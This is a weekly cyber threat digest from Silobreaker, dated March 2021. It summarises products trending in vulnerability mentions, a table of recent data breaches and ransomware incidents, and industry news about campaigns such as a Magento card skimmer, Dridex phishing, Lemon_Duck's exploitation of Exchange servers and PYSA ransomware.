18 March 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Cybozu Office
Adobe Animate
Microsoft Exchange Server Enterprise
Leptonica
MyBB Forum Software
Deep & Dark Web
Name Heat 7
Microsoft Exchange Server Enterprise
WordPress
Debian
Microsoft Internet Explorer
Social Warfare

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company Information Affected
Molson Coors Beverage (US) The company disclosed that its brewing, production, and shipping operations have been impacted by a cyberattack. BleepingComputer reported that multiple anonymous sources in the cybersecurity industry informed them that the incident was a ransomware attack. Unknown
Government of the Philippines The CyberPH for Human Rights group claimed responsibility for a DDoS attack against the government’s website, which took place on March 10th, 2021. The attack was reportedly carried out to protest the country’s worsening human rights situation. The attackers claim to have stolen unspecified data. Unknown
Trillium Community Health Plan (US) The company reported that some of its data was affected in the breach of their third-party file transfer appliance, Accellion. Potentially exposed data includes contact information, insurance ID numbers, dates of birth, and health information.  Unknown
Southern Illinois University School of Medicine (US) Some of the university’s data was affected in the breach of their third-party file transfer appliance, Accellion. Affected SIU data may contain patient names, dates of birth, Social Security Numbers, driver’s licenses, treatments, and insurance information. Unknown
Flink (Germany) Zerforschung researchers discovered an exposed server belonging to the delivery service. Data held on the compromised server included customer names, addresses, telephone numbers, e-mail addresses, the last four digits of their stored credit cards, and more. Unknown
Canada Revenue Agency The CRA is locking users from their online accounts as a precautionary measure after malicious actors were found to have obtained access to user IDs and passwords. The agency stated that the compromise was not the result of a CRA breach and that the data was likely obtained via email phishing schemes or third party data breaches. 800,000
Mobile Anaesthesiologists (US) The company is informing its patients of a data breach that took place sometime before December 14th, 2020. The breach allowed an unauthorised individual to possibly acquire some of the company’s data, including full names, health insurance information, and more. Unknown
Security Industry Specialists (US) An investigation into a ransomware attack on its systems on June 1st, 2020 revealed that the personal information of individuals was present in the folders accessed by the attackers. This includes names or other personal identifiers combined with financial account numbers or credit and debit card numbers, as well as account access codes and more. 36,762
St Bernards Total Life Healthcare (US) PeakTPA informed TLH of a ransomware attack that took place around December 28th, 2020. The data of TLH participants was reportedly accessed in the incident, including names, dates of birth, addresses, Social Security numbers, and diagnosis codes. Unknown
Preferred Home Care of New York (US) The home care agency informed individuals of a data breach that took place on January 8th, 2021. Potentially accessed data includes names, emails, financial information, Social Security numbers, medical information, and more. According to DataBreaches[.]net, the company was listed on the Sodinokibi ransomware leak site. 92,283
Overseas Service Corporation (US) The company disclosed a phishing email incident involving a ‘small number’ of its email accounts. The attack resulted in unauthorised access to information within these accounts, including names alongside Social Security numbers, financial and payment card numbers, driver’s license numbers, and limited medical information. Unknown
WeLeakInfo A hacker forum user claimed to have registered one of WeLeakInfo’s domains after the FBI let it expire and that they were able to obtain customer data. This allegedly includes partial credit card data, full names, email addresses, physical addresses, payment amounts, and more. Unknown
Bureau of Customs (Philippines) The actor Pinoy Clownsec compromised the BOC in an SQL injection attack. Members of the group gained access to a database containing over 366,000 sensitive records of individuals who have sent packages to the Philippines. The database was subsequently accessed by another actor, known as Phantom Troupe, who allegedly patched the vulnerabilities affecting the server. Pinoy Clownsec claims that the database is still compromised. Unknown
Fastway Couriers (Ireland) The Irish branch of the delivery company was targeted in a cyberattack identified on February 25th, 2021. The incident compromised the data of parcel recipients, including names, addresses and contact details for customers between mid-January and mid-February 2021. 446,143
Child Focus (US) The Ohio-based children and family support non-profit was targeted in an attack involving malware that compromised customer names, dates of birth, Social Security and Medicaid numbers, and health information.  2,716 
New London Hospital (US) The New Hampshire hospital was compromised in an unauthorised access incident in July 2020. A file containing patient names, limited demographic information, and Social Security numbers may have been copied by the intruder. 34,878
PeakTPA (US) The elderly care company identified a Netwalker ransomware attack against its servers on December 31st, 2020. Data stolen from two cloud servers may have included Social Security numbers, full names, addresses, and medical treatment information for 50,000 patients. Unknown
KLS Capital Ltd (Israel) Black Shadow hackers announced that they had hacked the servers of the car financing company. The group proceeded to expose data such as identity cards, letters, invoices and the personal information of the company’s CEO Omer Maman. Unknown
Unknown The Sodin gang alleged that nine entities have recently been compromised by Sodinokibi ransomware. The purported victims include two law firms, an insurance company, an architectural firm, a construction company, and an agricultural cooperative, all based in the US, as well as two international banks and a European manufacturer. The actor published evidence stolen from the alleged victims, including file directories, partial customer lists, customer quotes, copies of contracts and several official IDs. Unknown
Guns[.]com (US) A hacker forum user leaked a database attributed to the gun marketplace. The database includes user emails, addresses, full names, phone numbers, some bank account details, and more. The leak also contains the WordPress, MYSQL, and Azure Cloud credentials for the site’s administrators in plain text. The site acknowledged the breach, blaming it on third-party vendors. 400,000
Services Australia The company sent an email containing details of a Cashless Debit Card scheme to Northern Territory businesses. Recipient addresses were exposed as they were mistakenly included in the CC rather than BCC field. 600
Metro Presort (US) A renewed investigation into a ransomware attack against the company in 2019, found that names, addresses, patient and health plan IDs or account numbers, and more could potentially have been accessed. 38,387
Mimecast (UK) The company disclosed that the actor responsible for the SolarWinds attack accessed its production grid environment. The intruder accessed certain Mimecast-issued certificates and related customer server connection information, a subset of email addresses, and encrypted and/or hashed and salted credentials. Unknown
Zhaopin, Liepin and 51Job (China) The online job recruitment firms were found to allow paid corporate accounts to download resumes without the consent or awareness of the individuals. The resumes were then sold on social media QQ groups involved with illegally selling information and used by scammers. Unknown
Colorado Retina Associates (US) The eye care clinic was targeted in a phishing attack discovered on January 12th, 2021. The actor copied two user accounts containing patients’ contact information, dates of birth, clinical data, and a small number of Social Security numbers, driver’s licenses, and payment details. 26,609
Aljex (US) Website Planet researchers discovered an exposed misconfigured AWS S3 bucket belonging to the transportation management software company. The bucket contained shipment details with sensitive origin and recipient data, details of employees and sales representatives, as well as client names, phone numbers, and more. 4,000
Coleman Group (UK) The group suffered a cyberattack on the weekend of February 20th, 2021, during which some of its human resources and payroll files may have been accessed. The impacted files contain names, addresses, social insurance numbers and banking information relating to current and former employees. Unknown
Fiserv (US) The company found five clients for which auto-generated emails to their customers included a placeholder URL. This resulted in some customers receiving emails from Cashedge[.]com, Netspend[.]com, TCF National Bank, and Union Bank, which exposed customer data. For Cashedge[.]com, this included plan IDs, amounts being transferred, last four digits of account numbers, email addresses, and more. Unknown
Nikkei China Multiple incidents of unauthorised access to some email accounts were discovered, with the incidents believed to have begun in October 2020. Potentially impacted data includes names, email addresses, company names, addresses and phone numbers. In 24 instances, credit card information of corporate customers may also have been affected. Unknown

Threat Actor mentions in Critical Infrastructure

Time Series

This chart shows the trending Threat Actors related to Critical Infrastructure over the last week.

Weekly Industry View

Industry View
Industry Information
Retail & Hospitality Sucuri researchers observed a Magento 2 store compromise which used a malicious injection to capture POST data from site visitors on the checkout page. The injection encoded the captured data and saved it to a JPG file. According to the researchers, this allowed the attacker to keep the stolen data in a seemingly benign file and download it at their convenience. The injection could capture information submitted on the checkout page, including full names and addresses, payment card details, telephone numbers, as well as email addresses if the user was logged in.
Government Cofense researchers observed a new email phishing campaign impersonating the US Internal Revenue Service. The email references an application form for the American Rescue Plan and asks the user to download an Excel spreadsheet from Dropbox. Upon opening, the user is asked to enable macros. The researchers note that the macros do not directly download malware or run a PowerShell script, but instead drop an XSL file to disk and then use a WMI query to obtain system information. JavaScript contained in the XSL file is then executed via WMI and the banking trojan Dridex is downloaded.
Critical Infrastructure McAfee researchers observed a new espionage campaign, dubbed Operation Diànxùn, targeting telecommunications companies in Southeast Asia, Europe and the US. A strong interest in German, Vietnamese and Indian companies was identified. The initial attack vector is not known at present but believed to be via an attacker-controlled domain, with phishing websites masquerading as the Huawei company career page likely used. The final payload includes a backdoor for remote control and Cobalt Strike Beacon. The techniques used in the campaign resemble previous campaigns by RedDelta and Mustang Panda, though no use of PlugX was observed. The researchers assess with medium confidence that the campaign is related to the current ban of Chinese technology in the global 5G roll-out.
Technology Kaspersky researchers warned that threat actors responsible for the Lemon_Duck crypto mining botnet are ‘massively hitting’ vulnerable Microsoft Exchange Servers via ProxyLogon exploits. Following exploitation, the group downloads malicious payloads onto servers via web shells. Huntress Labs also identified indicators of compromise linked to the malware, which installs XMRig Monero CPU miners on devices, while examining Microsoft Exchange Server exploitation.
Education On March 16th, 2021, the Federal Bureau of Investigation (FBI) warned education institutions in the UK and US of a rise in PYSA ransomware attacks. The FBI stated that the attackers have been targeting K-12 schools, seminaries, and higher education institutions. The threat actors often gain initial access via Remote Desktop Protocol attacks and phishing before using tools such as PowerShell Empire, Mimikatz, and Koadic for further access. Prior to encrypting files, the attackers exfiltrate files which often include financial and employment data.

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Silobreaker
This website uses cookies.
See our privacy policy at www.silobreaker.com/legal